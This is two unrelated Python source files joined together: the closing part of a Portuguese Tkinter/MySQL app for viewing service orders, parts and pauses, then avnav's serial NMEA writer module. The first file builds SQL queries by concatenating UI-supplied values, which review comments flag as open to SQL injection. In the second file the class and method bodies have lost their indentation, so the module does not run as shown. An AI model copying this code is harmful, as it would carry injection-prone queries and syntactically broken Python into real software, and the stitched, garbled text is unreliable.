    self.labelerro2 = Label(self.frameDadosTreeviewPause, bg='white')
    try:
        # NOTE(review): SQL built by concatenating self.pegarOS — prefer a
        # parameterized query to avoid SQL injection; this also assumes
        # pegarOS is numeric text.
        self.cursor.execute("select ID, Operador, MotivoPause, CodigoPeca, Tipo, timediff(DataRetomada, DataPause), Produzido, Maquina, DataRetomada from pausas where OS ="+self.pegarOS)
        pausas = self.cursor.fetchall()
        if len(pausas) == 0:
            self.lbl = Label(self.frameDadosTreeviewPause, text='0 operações pausadas', font=('arial', 10), bg='white')
            self.lbl.place(relx=0.500, rely=0.500, anchor='center')
        for i in range (len(pausas)):
            # unpack the row into named variables before inserting it
            ID = pausas[i][0]
            Operador = pausas[i][1]
            MotivoPause = pausas[i][2]
            Peca = pausas[i][3]
            Tipo = pausas[i][4]
            Tempo = pausas[i][5]
            Produzido = pausas[i][6]
            Maquina = pausas[i][7]
            # DataRetomada is still NULL while the pause is running, so show
            # 'Pausado' instead of a duration
            if str(pausas[i][8]) == 'None':
                Tempo = 'Pausado'
            self.viewPausas.insert("", "end", values=(ID, Operador, MotivoPause, Peca, Tipo, Tempo, Produzido, Maquina))
    # best-effort: a DB failure leaves the view empty and only logs to stdout
    except Exception as erro: print(f'{erro}, {(erro.__class__)}')
def exibir_toplevel_pecas(self):
    """Build the 'parts used' page of janelaDetalhesOS.

    Creates a Treeview listing the parts attached to the current O.S.
    (self.pegarOS) and a side info panel with part/operation counters and
    the O.S. status, then fills both from the database.
    """
    self.botAtribuirOper = Button(self.janelaDetalhesOS, text='Função Oper', font=('arial', 9), bg='#344f84', fg='white', border=2, command=self.atribuir_tarefa)
    self.frameDadosTreeviewPecas = Frame(self.janelaDetalhesOS, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=1, bg='white')
    self.Add = PhotoImage(file="image/add.png")
    self.botAddPeca = Button(self.frameDadosTreeviewPecas, image=self.Add, compound=RIGHT, text='Add ', font=('arial', 11), bg='white', fg='black', border=2, relief=FLAT, height=15)
    self.chave = PhotoImage(file="image/chave.png")
    self.lbll = Label(self.frameDadosTreeviewPecas, image=self.chave, compound=LEFT, text=' Peças utilizadas:', font=('arial', 12, 'bold'), bg='white')
    self.lbll.place(relx=0.025, rely=0.013)
    # Treeview listing the parts used by this O.S.
    self.viewPecas = ttk.Treeview(self.frameDadosTreeviewPecas, column=('1','2','3','4','5','6','7'), show='headings')
    self.viewPecas.heading('1', text='ID', anchor='w')
    self.viewPecas.heading('2', text='Descrição', anchor='w')
    self.viewPecas.heading('3', text='Referência', anchor='w')
    self.viewPecas.heading('4', text='QTDE', anchor='w')
    self.viewPecas.heading('5', text='Material', anchor='w')
    self.viewPecas.heading('6', text='Tratamento', anchor='w')
    self.viewPecas.heading('7', text='Cod de Desenho', anchor='w')
    self.viewPecas.column("1", width=0, anchor='w', minwidth=50)
    self.viewPecas.column("2", width=0, anchor='w', minwidth=250)
    self.viewPecas.column("3", width=0, anchor='w', minwidth=120)
    self.viewPecas.column("4", width=0, anchor='w', minwidth=50)
    self.viewPecas.column("5", width=0, anchor='w', minwidth=120)
    self.viewPecas.column("6", width=0, anchor='w', minwidth=120)
    self.viewPecas.column("7", width=0, anchor='w', minwidth=120)
    self.viewPecas.place(relx=0.025, rely=0.115, relwidth=0.945, relheight=0.840)
    # NOTE(review): these bindings reuse the pause-details handler
    # (exibir_info__pausa); looks copy-pasted from the pauses view — confirm
    # this is intended for the parts view.
    self.viewPecas.bind("<Return>", self.exibir_info__pausa)
    self.viewPecas.bind("<Double-1>", self.exibir_info__pausa)
    self.viewPecas.bind("<Escape>", lambda event: self.remover_focus(event, self.viewPecas))
    scrollbar3 = Scrollbar(self.frameDadosTreeviewPecas, orient="vertical", command=self.viewPecas.yview)
    self.viewPecas.configure(yscrollcommand=scrollbar3.set)
    scrollbar3.place(relx=0.975, rely=0.115, relwidth=0.025, relheight=0.835)
    scrollbar4 = Scrollbar(self.frameDadosTreeviewPecas, orient="horizontal", command=self.viewPecas.xview)
    self.viewPecas.configure(xscrollcommand=scrollbar4.set)
    scrollbar4.place(relx=0.025, rely=0.950, relwidth=0.950, relheight=0.045)
    # Side info panel.  NOTE(review): self.lblP is reassigned for every label
    # below, so only the last one remains reachable through the attribute.
    self.frameInformacao = Frame(self.janelaDetalhesOS, highlightbackground='white', highlightcolor='white', highlightthickness=1, bg='white')
    self.doc = PhotoImage(file="image/doc.png")
    self.lblP = Label(self.frameInformacao, image=self.doc, compound=LEFT, text=' Info O.S.', font=('arial', 20, 'bold'), bg='white')
    self.lblP.place(relx=0.999, rely=0.120, anchor='e')
    self.lblP = Label(self.frameInformacao, text='Nº Peças:', font=('arial', 12, 'bold'), bg='white')
    self.lblP.place(relx=0.999, rely=0.300, anchor='e')
    self.lblP = Label(self.frameInformacao, font=('arial', 12), bg='white', border=2, relief=GROOVE, anchor='e')
    self.lblP.place(relx=0.999, rely=0.370, anchor='e', relwidth=0.950)
    try:
        # number of produced-part records for this O.S.
        self.cursor.execute('select count(Produzido) from concluidas where OS = '+self.pegarOS)
        self.lblP['text'] = self.cursor.fetchall()[0][0]
    except Exception as erro: print(erro)
    self.lblP = Label(self.frameInformacao, text='Nº Operações:', font=('arial', 12, 'bold'), bg='white')
    self.lblP.place(relx=0.999, rely=0.460, anchor='e')
    self.lblP = Label(self.frameInformacao, font=('arial', 12), bg='white', border=2, relief=GROOVE, anchor='e')
    self.lblP.place(relx=0.999, rely=0.530, anchor='e', relwidth=0.950)
    try:
        # number of operations registered for this O.S.
        self.cursor.execute('select count(id) from ordem_processo where OS = '+self.pegarOS)
        self.lblP['text'] = self.cursor.fetchall()[0][0]
    except Exception as erro: print(erro)
    self.cc = PhotoImage(file="image/check.png")
    self.lblP = Label(self.frameInformacao, image=self.cc, compound=LEFT, text=' Aberta', font=('arial', 20, 'bold'), bg='white')
    self.lblP.place(relx=0.999, rely=0.910, anchor='e')
    self.frameInformacao.place(relx=0.800, rely=0.200, relwidth=0.180, relheight=0.780)
    try:
        # resolve the internal id of the O.S., then list its attached parts.
        # NOTE(review): SQL built by string concatenation — prefer
        # parameterized queries.
        self.cursor.execute("select id from ordem_servico where OS = "+self.pegarOS)
        idOS = self.cursor.fetchall()[0][0]
        self.cursor.execute('select b.ID, b.Descricao, b.CodPeca, a.QTDE, b.Material, b.Tratamento, b.CodDesenho from ordem_pecas as a join pecas as b on a.idPeca = b.id join ordem_servico as c on a.idOS = c.id where a.idOS ='+str(idOS))
        listPecas = self.cursor.fetchall()
        for peca in listPecas:
            self.viewPecas.insert("", "end", values=peca)
    except Exception as erro: print(f'{erro}, {(erro.__class__)}')
def exibir_toplevel_sobre(self):
    """Build the 'Relatório de O.S' summary page of janelaDetalhesOS.

    Aggregates totals for the current O.S. (self.pegarOS) — operators,
    completed/rework operations, produced parts, pauses and several time
    totals — and renders them as paired rows: descriptions on the left
    frame, values on the right frame.
    """
    # BUG FIX: initialize every aggregate with a safe default.  The labels
    # below reference these names, so a failed/offline DB query (whose
    # exception is only printed) must not end in a NameError.
    operador = 0
    totalConcluídas = 0
    totalRetrabalho = 0
    totalPecas = 0
    totalOperacao = 0
    totalPausas = 0
    totalTempoPausado = 0
    totalTempoProgramado = 0
    totalTempoExtra = 0
    totalTempo = 0
    try:
        # NOTE(review): all queries concatenate self.pegarOS into the SQL —
        # prefer parameterized queries to avoid SQL injection.
        self.cursor.execute('select count(distinct idOperador) from ordem_processo where OS = '+self.pegarOS)
        operador = self.cursor.fetchall()[0][0]
        self.cursor.execute('select count(Tipo) from concluidas where Tipo = "Nova OS" and OS = '+self.pegarOS)
        totalConcluídas = self.cursor.fetchall()[0][0]
        self.cursor.execute('select count(Tipo) from concluidas where Tipo = "Retrabalhar OS" and OS = '+self.pegarOS)
        totalRetrabalho = self.cursor.fetchall()[0][0]
        self.cursor.execute('select Produzido from concluidas where OS = '+self.pegarOS)
        totalPecas = self.cursor.fetchall()
        # sum the produced quantity over all completed rows
        soma = 0
        for produto in totalPecas:
            soma += produto[0]
        totalPecas = soma
        self.cursor.execute('select idOperacao from ordem_processo where OS = '+self.pegarOS)
        totalOperacao = len(self.cursor.fetchall())
        self.cursor.execute('select count(ID) from pausas where OS = '+self.pegarOS)
        totalPausas = self.cursor.fetchall()[0][0]
        # time totals are delegated to somar_total_horas_gastas_os
        # (second arg: 1 = one time column, 2 = two columns — TODO confirm)
        SQL = ("select timediff(DataRetomada, DataPause) as result from pausas where OS = '"+self.pegarOS+"' and DataRetomada <> 'none' and MotivoPause <> 'Final de Expediente' and MotivoPause <> 'Horário de Almoço' ")
        totalTempoPausado = self.somar_total_horas_gastas_os(SQL, 1)
        SQL = ('select TempoProgramado from ordem_processo where OS = '+self.pegarOS)
        totalTempoProgramado = self.somar_total_horas_gastas_os(SQL, 1)
        SQL = ('select TempGastoExt from concluidas where OS = '+self.pegarOS)
        totalTempoExtra = self.somar_total_horas_gastas_os(SQL, 1)
        SQL = ('select TempGasto, TempGastoExt from concluidas where OS = '+self.pegarOS)
        totalTempo = self.somar_total_horas_gastas_os(SQL, 2)
    except Exception as erro:
        print(f'ERROOOO {erro}, {(erro.__class__)}')
    # Layout: top title bar plus a description column (left) and a value
    # column (right)
    self.frameInfoRelatorio = Frame(self.janelaDetalhesOS, highlightbackground='black', highlightthickness=2, width=700)
    self.frameLadoTop = Frame(self.frameInfoRelatorio, highlightbackground='black', highlightthickness=2, bg='white')
    self.frameLadoTop.place(relx=0, rely=0, relwidth=1, relheight=0.130)
    self.frameLadoEsquerdo = Frame(self.frameInfoRelatorio, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
    self.frameLadoEsquerdo.place(relx=0, rely=0.130, relwidth=0.385, relheight=0.870)
    self.frameLadoDireito = Frame(self.frameInfoRelatorio, highlightbackground='#e6e6e6', highlightcolor='#e6e6e6', highlightthickness=0)
    self.frameLadoDireito.place(relx=0.385, rely=0.130, relwidth=0.615, relheight=0.870)
    label = Label(self.frameLadoTop, text='Relatório de O.S', font=('arial', 15, 'bold'), fg='#344f84', bg='white')
    label.place(relx=0.400, rely=0.200)
    # Description labels (left column); order must match `valores` below
    for texto in ('Total de Operadores', 'Total de Concluídas', 'Total de Retrabalhos',
                  'Total de Peças Produzidas', 'Total de Operações', 'Total de Pausas Cometidas',
                  'Total de Horas Pausadas', 'Total de Horas Determinadas',
                  'Total de Horas Extras', 'Total de Tempo'):
        label = Label(self.frameLadoEsquerdo, text=texto, font=('arial', 12, 'bold'), border=2, relief=SOLID, width=31, fg='#344f84', bg='white')
        label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
    # Value labels (right column), in the same order as the descriptions
    valores = (operador, totalConcluídas, totalRetrabalho, totalPecas, totalOperacao,
               totalPausas, totalTempoPausado, totalTempoProgramado, totalTempoExtra, totalTempo)
    for indice, valor in enumerate(valores):
        label = Label(self.frameLadoDireito, text=valor, font=('arial', 14, 'bold'), border=1, relief=SOLID, width=60, bg='white')
        label.pack(side=TOP, anchor='w', fill=Y, expand=YES)
        # highlight the rework count (row index 2) in red when any rework exists
        if indice == 2 and totalRetrabalho != 0:
            label['fg'] = 'red'
#Janelas que informa as datas das Operações e Pausas respectivas aos seus botões de opções
def exibir_info_da_operacao(self, event):
    """Open a Toplevel showing the details of the operation currently
    selected in viewOrdemServico: operator name, formatted CPF and the
    open/start/finish timestamps.

    Bound to <Return> and <Double-1> on the treeview; returns immediately
    when no row is selected.
    """
    try:
        # id of the operation selected in the treeview at the moment the
        # window was opened
        selecionada = self.viewOrdemServico.selection()[0]
        pegarID = self.viewOrdemServico.item(selecionada, "values")
        pegarID = pegarID[0]
    except: return ''
    self.exibir_info_tempo_horas('')
    try:
        # NOTE(review): SQL built by concatenation — pegarID comes from the
        # UI; prefer a parameterized query to avoid SQL injection.
        self.cursor.execute("select b.Nome, b.CPF, a.DataAberta, a.DataIniciada, a.DataFinalizada from ordem_processo as a join funcionarios as b on b.id = a.idOperador where a.id ="+pegarID)
        result = self.cursor.fetchall()
    except Exception as erro:
        print(f'{erro}, {(erro.__class__)}')
        if messagebox.showerror(parent=self.janelaDetalhesOS, title='Verifique a conexão', message='Sem conexão com Banco de Dados'):
            return 0
    else:
        nome = result[0][0]
        # format the 11-digit CPF as XXX.XXX.XXX-XX
        cpf = str(result[0][1])
        a = cpf[0:3]
        b = cpf[3:6]
        c = cpf[6:9]
        d = cpf[9:]
        cpf = a+'.'+b+'.'+c+'-'+d
        # split each datetime into its date and time halves; show ' ** '
        # placeholders when the column is NULL
        if result[0][2] is not None:
            dataAberta = str(result[0][2])
            dataAberta = dataAberta.split()[0]
            horaAberta = str(result[0][2])
            horaAberta = horaAberta.split()[1]
        else:
            # BUG FIX: this else branch was missing — a NULL DataAberta left
            # dataAberta/horaAberta undefined and crashed the label creation
            # below with a NameError (the two sibling fields already had it).
            dataAberta = ' ** '
            horaAberta = ' ** '
        if result[0][3] is not None:
            dataInicial = str(result[0][3])
            dataInicial = dataInicial.split()[0]
            horaInicial = str(result[0][3])
            horaInicial = horaInicial.split()[1]
        else:
            dataInicial = ' ** '
            horaInicial = ' ** '
        if result[0][4] is not None:
            dataFinal = str(result[0][4])
            dataFinal = dataFinal.split()[0]
            horaFinal = str(result[0][4])
            horaFinal = horaFinal.split()[1]
        else:
            dataFinal = ' ** '
            horaFinal = ' ** '
        # Mini window displaying the operation details
        tela = Toplevel()
        tela.title('Detalhes da operação')
        tela['bg'] = 'white'
        self.centraliza_tela(400, 400, tela)
        def sair(event):
            tela.destroy()
        tela.bind('<Escape>', sair)
        lbl = Label(tela, text='Nome:', font=('arial', 10), fg='black', bg='white')
        lbl.place(relx=0.020, rely=0.020)
        lbl = Label(tela, text=nome, font=('arial', 10), border=0, relief=GROOVE, bg='white')
        lbl.place(relx=0.200, rely=0.025)
        lbl = Label(tela, text='CPF:', font=('arial', 10), fg='black', bg='white')
        lbl.place(relx=0.020, rely=0.080)
        lbl = Label(tela, text=cpf, font=('arial', 10), border=0, relief=GROOVE, bg='white')
        lbl.place(relx=0.200, rely=0.085)
        # thin horizontal separator
        canvas = Canvas(tela, bg='#e1e1e1')
        canvas.place(relx=0.020, rely=0.160, relheight=0.005)
        lbl = Label(tela, text='Aberta às '+horaAberta+' no dia '+dataAberta, font=('arial', 10), bg='white')
        lbl.place(relx=0.50, rely=0.220, anchor='center')
        lbl = Label(tela, text='Iniciada às '+horaInicial+' no dia '+dataInicial, font=('arial', 10), bg='white')
        lbl.place(relx=0.50, rely=0.290, anchor='center')
        lbl = Label(tela, text='Finalizada às '+horaFinal+' no dia '+dataFinal, font=('arial', 10), bg='white')
        lbl.place(relx=0.50, rely=0.360, anchor='center')
        canvas = Canvas(tela, bg='#e1e1e1')
        canvas.place(relx=0.020, rely=0.420, relheight=0.005)
        frame = LabelFrame(tela, text='Observação', bg='white', highlightbackground='#e1e1e1', highlightcolor='#e1e1e1')
        frame.place(relx=0.050, rely=0.580, relwidth=0.900, relheight=0.300)
        # modal behaviour relative to the details window
        tela.transient(self.janelaDetalhesOS)
        tela.focus_force()
        tela.grab_set()
        tela.mainloop()
def exibir_info__pausa(self, event):
    """Open a Toplevel showing the details of the pause currently selected
    in viewPausas: operator name, formatted CPF and the pause/resume
    timestamps.

    Bound to <Return> and <Double-1> on the treeview; returns immediately
    when no row is selected.
    """
    try:
        # id of the pause selected in the treeview at the moment the window
        # was opened
        selecionada = self.viewPausas.selection()[0]
        pegarID = self.viewPausas.item(selecionada, "values")
        pegarID = pegarID[0]
    except: return ''
    self.exibir_info_tempo_horas('')
    tela = Toplevel()
    # center the window on screen
    self.centraliza_tela(400, 400, tela)
    def sair(event):
        tela.destroy()
    tela.bind('<Escape>', sair)
    try:
        # NOTE(review): SQL built by concatenation — prefer a parameterized
        # query to avoid SQL injection.
        self.cursor.execute('select Operador, CPF, DataPause, DataRetomada from pausas where id = '+pegarID)
        detalhes = self.cursor.fetchall()
        nome = detalhes[0][0]
        # format the 11-digit CPF as XXX.XXX.XXX-XX
        cpf = detalhes[0][1]
        a = cpf[0:3]
        b = cpf[3:6]
        c = cpf[6:9]
        d = cpf[9:]
        cpf = a+'.'+b+'.'+c+'-'+d
        # split each datetime into its time and date halves
        horaPause = str(detalhes[0][2])
        horaPause = horaPause.split()[1]
        dataPause = str(detalhes[0][2])
        dataPause = dataPause.split()[0]
        horaRetomada = str(detalhes[0][3])
        horaRetomada = horaRetomada.split()[1]
        dataRetomada = str(detalhes[0][3])
        dataRetomada = dataRetomada.split()[0]
    except:
        # fall back to blanks so the window can still be rendered
        nome = ''
        cpf = ''
        # BUG FIX: horaPause/dataPause were missing from these defaults,
        # causing a NameError below whenever the query/parsing failed
        horaPause = ''
        dataPause = ''
        horaRetomada = ''
        dataRetomada = ''
    lbl = Label(tela, text='Nome', font=('arial', 12, 'bold'), fg='#344f84')
    lbl.place(relx=0.020, rely=0.020)
    lbl = Label(tela, text=nome, font=('arial', 10), border=2, relief=GROOVE)
    lbl.place(relx=0.200, rely=0.020, relwidth=0.700)
    lbl = Label(tela, text='CPF', font=('arial', 12, 'bold'), fg='#344f84')
    lbl.place(relx=0.020, rely=0.080)
    lbl = Label(tela, text=cpf, font=('arial', 10), border=2, relief=GROOVE)
    lbl.place(relx=0.200, rely=0.080, relwidth=0.400)
    frame = LabelFrame(tela, text='Data', fg='#344f84')
    frame.place(relx=0.050, rely=0.200, relwidth=0.900, relheight=0.170)
    lbl = Label(frame, text='Hora Pause', font=('arial', 10, 'bold'), fg='#344f84')
    lbl.place(relx=0.040, rely=0)
    lbl = Label(frame, text=horaPause, font=('arial', 10), border=0, relief=GROOVE)
    lbl.place(relx=0.310, rely=0.050, relwidth=0.170)
    lbl = Label(frame, text='Data Pause', font=('arial', 10, 'bold'), fg='#344f84')
    lbl.place(relx=0.510, rely=0)
    lbl = Label(frame, text=dataPause, font=('arial', 10), border=0, relief=GROOVE)
    lbl.place(relx=0.780, rely=0.050, relwidth=0.200)
    lbl = Label(frame, text='Hora Retomada', font=('arial', 10, 'bold'), fg='#344f84')
    lbl.place(relx=0.010, rely=0.450)
    lbl = Label(frame, text=horaRetomada, font=('arial', 10), border=0, relief=GROOVE)
    lbl.place(relx=0.310, rely=0.470, relwidth=0.170)
    lbl = Label(frame, text='Data Retomada', font=('arial', 10, 'bold'), fg='#344f84')
    lbl.place(relx=0.480, rely=0.450)
    lbl = Label(frame, text=dataRetomada, font=('arial', 10), border=0, relief=GROOVE)
    lbl.place(relx=0.780, rely=0.470, relwidth=0.200)
    frame = LabelFrame(tela, text='Observação', fg='#344f84')
    frame.place(relx=0.050, rely=0.380, relwidth=0.900, relheight=0.300)
    # modal behaviour relative to the details window
    tela.transient(self.janelaDetalhesOS)
    tela.focus_force()
    tela.grab_set()
    tela.mainloop()
# Module entry point: create the application instance (presumably this
# builds the Tk UI and enters its main loop — confirm in Application.__init__).
instancia = Application()
serialwriter.py | # -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2021 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
###############################################################################
import traceback
import time
from avnserial import *
import avnav_handlerList
from avnav_nmea import NMEAParser
from avnav_util import AVNLog
from avnav_worker import AVNWorker
hasSerial=False
try:
import serial
hasSerial=True
except:
pass
#a writer class to write to a serial port using pyserial
#on windows use an int for the port - e.g. use 4 for COM5
#on linux use the device name for the port
#this class is not directly a worker that can be instantiated from the config
#instead it is used by worker classes to handle serial output
#basically the configuration is the same like for the reader
#except that autobaud settings are ignored
class SerialWriter(SerialReader):
@classmethod
def getConfigParam(cls):
  """Return the writer's config parameters.

  Starts from the reader's parameter list, drops the autobaud-related
  'minbaud' entry (autobaud is ignored for writing) and appends the
  writer-specific parameters.
  """
  inherited = [p for p in SerialReader.getConfigParam() if p.name != 'minbaud']
  writerOnly = [
    WorkerParameter('feederName', '', type=WorkerParameter.T_STRING, editable=False),
    WorkerParameter('combined', False, type=WorkerParameter.T_BOOLEAN,
                    description='if true, also start a reader'),
    WorkerParameter('readFilter', '', type=WorkerParameter.T_FILTER,
                    condition={'combined': True}),
    WorkerParameter('blackList', '', type=WorkerParameter.T_STRING,
                    description=', separated list of sources that we will not send out')
  ]
  return inherited + writerOnly
#parameters:
#param - the config dict
#writeData - a write data method used to hand over a received line (combined mode)
#infoHandler - status/info sink
#sourceName - the name used as NMEA source; it is always blacklisted to avoid echoing
def __init__(self,param,writeData,infoHandler,sourceName):
  """Set up the writer: validate the config, resolve the feeder and build
  the source blacklist.

  Raises Exception when a mandatory parameter is missing, writeData is
  unset or no feeder can be found.
  """
  for p in ('port','name','timeout'):
    if param.get(p) is None:
      raise Exception("missing "+p+" parameter for serial writer")
  self.param=param
  self.infoHandler=infoHandler
  self.doStop=False
  self.writeData=writeData
  if self.writeData is None:
    raise Exception("writeData has to be set")
  feeder=AVNWorker.findFeeder(self.param.get('feederName'))
  if feeder is None:
    # BUG FIX: the message was passed with the format args as extra Exception
    # arguments instead of being %-formatted into the string
    raise Exception("%s: cannot find a suitable feeder (name %s)"%(self.getName(),self.param.get('feederName') or ""))
  self.feeder=feeder
  self.addrmap={}
  #the serial device
  self.device=None
  self.buffer=None
  self.sourceName=sourceName
  self.blackList=[]
  # BUG FIX: the parameter is declared as 'blackList' in getConfigParam but
  # was read as 'blacklist' here; read the declared key first and keep the
  # lower-case spelling as a backward-compatible fallback
  blackListStr=param.get('blackList')
  if blackListStr is None:
    blackListStr=param.get('blacklist')
  if blackListStr is not None:
    self.blackList=blackListStr.split(',')
  # never echo our own output back out
  self.blackList.append(sourceName)
  self.combinedStatus={}
def stopHandler(self):
  """Request the run loop to stop and close the port so that a blocking
  write returns immediately; closing errors are deliberately ignored."""
  self.doStop=True
  device=self.device
  try:
    device.close()
  except:
    pass
def openDevice(self,baud,autobaud,init=False):
  """Open the configured serial port for writing.

  Returns the open serial.Serial instance or None on failure (status is
  reported via setInfoWithKey in both cases).  `autobaud` is ignored — the
  parameter only exists for signature compatibility with the reader.
  `init` merely raises the log level of the first 'opening' message.
  """
  self.buffer=''
  f=None
  # on windows an int port (e.g. 4 for COM5) is allowed; otherwise keep the
  # device name as-is
  try:
    pnum=int(self.param['port'])
  except:
    pnum=self.param['port']
  bytesize=int(self.param['bytesize'])
  parity=self.param['parity']
  stopbits=int(self.param['stopbits'])
  xonxoff=self.P_XONOFF.fromDict(self.param)
  rtscts=self.P_RTSCTS.fromDict(self.param)
  portname=self.param['port']
  timeout=float(self.param['timeout'])
  isCombined = self.param.get('combined') or False
  modeStr='writer' if not isCombined else 'combined'
  # removed dead locals from the original: name, lastTime and a no-op
  # `init=False` assignment (init is not read again in this method)
  if init:
    AVNLog.info("openDevice for port %s, baudrate=%d, timeout=%f",
                portname,baud,timeout)
  else:
    AVNLog.debug("openDevice for port %s, baudrate=%d, timeout=%f",portname,baud,timeout)
  try:
    self.setInfoWithKey("writer","%s opening %s at %d baud"%(modeStr,portname,baud),WorkerStatus.STARTED)
    f=serial.Serial(pnum, timeout=timeout, baudrate=baud, bytesize=bytesize, parity=parity, stopbits=stopbits, xonxoff=xonxoff, rtscts=rtscts)
    self.setInfoWithKey("writer","%s port %s open at %d baud"%(modeStr,portname,baud),WorkerStatus.STARTED)
    return f
  except Exception:
    self.setInfoWithKey("writer","%s unable to open port %s"%(modeStr,portname),WorkerStatus.ERROR)
    try:
      tf=traceback.format_exc(3)
    except:
      tf="unable to decode exception"
    AVNLog.debug("Exception on opening %s : %s",portname,tf)
    # make sure a half-opened handle is released before returning None
    if f is not None:
      try:
        f.close()
      except:
        pass
      f=None
  return f
def writeLine(self,serialDevice,data):
  """Write one NMEA line to the port; non-ASCII characters are dropped.
  Returns the number of bytes written (serial.Serial.write's result)."""
  encoded=data.encode('ascii','ignore')
  return serialDevice.write(encoded)
#the run method - just try forever
def run(self):
  """Main loop of the writer.

  Optionally starts the combined reader thread, then loops until doStop:
  (re)open the port, pump NMEA lines from the feeder history to it
  (skipping blacklisted sources), and on any write error close the port
  and reopen it.
  """
  threading.current_thread().name="%s - %s"%(self.getName(),self.param['port'])
  self.device=None
  init=True
  AVNLog.debug("started with param %s",",".join(str(i)+"="+str(self.param[i]) for i in list(self.param.keys())))
  self.setInfoWithKey("writer","created",WorkerStatus.STARTED)
  startReader=self.param.get('combined')
  if startReader is not None and str(startReader).upper()=='TRUE':
    AVNLog.debug("starting reader")
    reader=threading.Thread(target=self.readMethod)
    reader.daemon=True  # daemon attribute instead of deprecated setDaemon()
    reader.start()
  while not self.doStop:
    timeout=float(self.param['timeout'])
    portname=self.param['port']
    porttimeout=timeout*10
    baud=int(self.param['baud'])
    # BUG FIX: was `if filterstr != ""` which crashes with AttributeError on
    # None.split when the 'filter' parameter is unset; also renamed the local
    # so it no longer shadows the builtin `filter`
    filterstr=self.param.get('filter')
    nmeaFilter=None
    if filterstr:
      nmeaFilter=filterstr.split(',')
    self.device=self.openDevice(baud,False,init=init)
    init=False
    if self.doStop:
      AVNLog.info("handler stopped, leaving")
      self.setInfoWithKey("writer","stopped",WorkerStatus.INACTIVE)
      try:
        self.device.close()
        self.device=None
      except:
        pass
      return
    if self.device is None:
      # open failed: back off before retrying
      time.sleep(porttimeout/2)
      continue
    AVNLog.debug("%s opened, start sending data",self.device.name)
    # removed dead locals from the original: name, isOpen, bytes, lastTime,
    # numerrors and maxerrors were assigned but never used
    seq=0
    while not self.doStop:
      try:
        # fetch up to the next batch from the feeder history; seq tracks our
        # read position
        seq,data=self.feeder.fetchFromHistory(seq,10,includeSource=True,nmeafilter=nmeaFilter)
        if len(data)>0:
          for line in data:
            if line.source in self.blackList:
              AVNLog.debug("ignore %s:%s due to blacklist",line.source,line.data)
            else:
              self.writeLine(self.device,line.data)
      except Exception:
        AVNLog.debug("Exception %s in serial write, close and reopen %s",traceback.format_exc(),portname)
        try:
          self.device.close()
          self.device=None
          seq=0
        except:
          pass
        break
  AVNLog.info("stopping handler")
  self.setInfoWithKey("writer","stopped",WorkerStatus.INACTIVE)
  self.deleteInfo()
# the read method for the combined reader/writer
def readMethod(self):
    """Reader loop for 'combined' mode.

    Reads NMEA lines from the open serial device and hands them to
    self.writeData.  Lines are dropped when too short or when they do
    not match the configured readFilter.  Runs until doStop is set;
    errors only reset the status and the loop keeps retrying.
    """
    threading.current_thread().setName("%s-combinedReader" % self.getName())
    self.setInfoWithKey("reader", "started", WorkerStatus.STARTED)
    AVNLog.info("started")
    filterstr = self.param.get('readFilter')
    nmea_filter = None
    # guard against a missing/empty readFilter parameter: param.get may
    # return None, and None.split() would crash the thread
    if filterstr:
        nmea_filter = filterstr.split(',')
    hasNmea = False
    source = self.sourceName
    while not self.doStop:
        try:
            if self.device is not None:
                raw = self.device.readline(300)
                if self.doStop:
                    AVNLog.info("Stopping reader of combined reader/writer %s", str(self.param['port']))
                    self.deleteInfoWithKey("reader")
                    return
                if raw is None or len(raw) == 0:
                    # if there is no data at all we simply take all the time we have...
                    AVNLog.debug("unable to read data, retrying ")
                    time.sleep(0.1)
                    continue
                data = raw.decode('ascii', 'ignore')
                if len(data) < 5:
                    AVNLog.debug("ignore short data %s", data)
                else:
                    if not NMEAParser.checkFilter(data, nmea_filter):
                        AVNLog.debug("ignore line %s due to not matching filter", data)
                        continue
                    if not hasNmea:
                        self.setInfoWithKey("reader", "receiving data", WorkerStatus.NMEA)
                        # remember that we already reported reception; the
                        # original never set this, so the status was
                        # rewritten for every single line (it is reset to
                        # False again in the error path below)
                        hasNmea = True
                    if not self.writeData is None:
                        self.writeData(data, source)
                    else:
                        AVNLog.debug("unable to write data")
            else:
                time.sleep(0.5)
        except:
            AVNLog.debug("exception on read in mixed reader/writer %s (port %s)", traceback.format_exc(), str(self.param['port']))
            time.sleep(0.5)
            hasNmea = False
def _updateStatus(self):
    """Aggregate the per-key entries in combinedStatus into one 'main'
    status: ERROR wins, then NMEA, otherwise the first non-INACTIVE."""
    aggregated = WorkerStatus.INACTIVE
    summary = ''
    for key, entry in self.combinedStatus.items():
        if entry.status == WorkerStatus.ERROR:
            aggregated = WorkerStatus.ERROR
        elif entry.status == WorkerStatus.NMEA and aggregated != WorkerStatus.ERROR:
            aggregated = WorkerStatus.NMEA
        elif aggregated == WorkerStatus.INACTIVE and entry.status != WorkerStatus.INACTIVE:
            aggregated = entry.status
        summary += "%s:[%s] %s " % (entry.name, entry.status, entry.info)
    if self.infoHandler is not None:
        if self.combinedStatus:
            self.infoHandler.setInfo('main', summary, aggregated)
        else:
            self.infoHandler.deleteInfo('main')
def setInfoWithKey(self, key, txt, status):
    """Store (or replace) the status entry for *key* and refresh the
    aggregated 'main' status."""
